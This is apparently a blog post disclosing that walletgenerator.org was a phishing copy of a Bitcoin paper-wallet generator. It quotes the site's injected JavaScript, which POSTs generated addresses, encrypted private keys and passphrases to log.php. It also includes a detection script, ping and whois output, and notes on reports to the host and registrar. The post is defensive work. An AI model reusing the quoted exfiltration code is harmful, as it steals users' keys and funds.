The website at walletgenerator.org is a modified version (phishing replica) of walletgenerator.net.

The phishing site is stealing the private keys and the pass-phrases.

Look in the code for lines like these:

var http = new XMLHttpRequest();
http.open("POST", "log.php", true);
http.send(generatedAddress + "," + Bitcoin.Base58.encode(encryptedKey) + "-" + document.currentBipPassphrase + "," + janin.selectedCurrency.name);
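One way to automate that check on a saved copy of a generator page, as an added example that is not code from either site: it lists every network-capable call in the inline scripts and marks those with key-like names nearby. The function names, the list of sinks and the sample page are assumptions made for illustration.

```javascript
// Added example: flag network-capable calls in a saved wallet-generator page.
const SINKS = [
  /new\s+XMLHttpRequest\s*\(/, /\bfetch\s*\(/, /navigator\.sendBeacon\s*\(/,
  /new\s+WebSocket\s*\(/, /new\s+Image\s*\(/, /\$\.(ajax|post|get)\s*\(/,
];
// Names from the snippet quoted on this page, plus privateKey (assumed).
const SENSITIVE = /encryptedKey|privateKey|passphrase|generatedAddress/i;

// Return each inline <script> body with the 1-based line where it starts.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push({ startLine: html.slice(0, m.index).split("\n").length, body: m[1] });
  }
  return out;
}

// Report every sink, and whether key-like names appear within the next lines.
function scanPage(html, windowLines = 3) {
  const findings = [];
  for (const { startLine, body } of inlineScripts(html)) {
    const lines = body.split("\n");
    lines.forEach((line, i) => {
      if (!SINKS.some((re) => re.test(line))) return;
      const context = lines.slice(i, i + windowLines + 1).join("\n");
      findings.push({
        line: startLine + i,
        code: line.trim(),
        touchesKeyMaterial: SENSITIVE.test(context),
      });
    });
  }
  return findings;
}

// Constructed sample page (not the real site's markup).
const SAMPLE = [
  "<html><body>",
  "<script>",
  "var label = 'paper wallet';",
  "var http = new XMLHttpRequest();",
  'http.open("POST", "log.php", true);',
  'http.send(generatedAddress + "," + encryptedKey);',
  "</script>",
  "</body></html>",
].join("\n");
console.log(scanPage(SAMPLE));
```

A finding is a lead for manual review of that line, not proof of theft; scripts loaded from external files have to be saved and scanned separately.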

Also, on the phishing website the security warning is missing:

You appear to be running this generator off of a live website, which is not recommended for creating valuable wallets. Instead, use the download link at the bottom of this page to download the ZIP file from GitHub and run this generator offline as a 'local' HTML file.

The phishing wallet generator:

The original:

Some differences in the code (shown with meld):

I copied the code on pastebin in case someone wants to study it: https://pastebin.com/wmvZuSND

It looks like it's hosted by Sourceway.de. I notified them.

valentin@computer:~$ ping walletgenerator.org -c 1
PING walletgenerator.org (5.189.157.67) 56(84) bytes of data.
64 bytes from web.sourceway.de (5.189.157.67): icmp_seq=1 ttl=61 time=46.8 ms
--- walletgenerator.org ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 46.895/46.895/46.895/0.000 ms
valentin@computer:~$

valentin@computer:~$ ping web.sourceway.de -c 1
PING web.sourceway.de (5.189.157.67) 56(84) bytes of data.
64 bytes from web.sourceway.de (5.189.157.67): icmp_seq=1 ttl=61 time=46.6 ms
--- web.sourceway.de ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 46.655/46.655/46.655/0.000 ms

Also, I sent an email to the Registrar's abuse email address.

valentin@computer:~$ whois cronon.net | grep abuse
Registrar Abuse Contact Email: abuse-domains@cronon.net
valentin@computer:~$

I got this response from the web hosting provider: Stealing Bitcoin "is nothing illegal, but morally wrong" - WTF?

Update

$ resolveip walletgenerator.org
IP address of walletgenerator.org is 176.123.0.55
$ whois 176.123.0.55 | grep -i abuse
% Abuse contact for '176.123.0.0 - 176.123.31.255' is 'noc@alexhost.com'
abuse-c: AR18916-RIPE

It still works (10 April 2018); the web hosting has changed: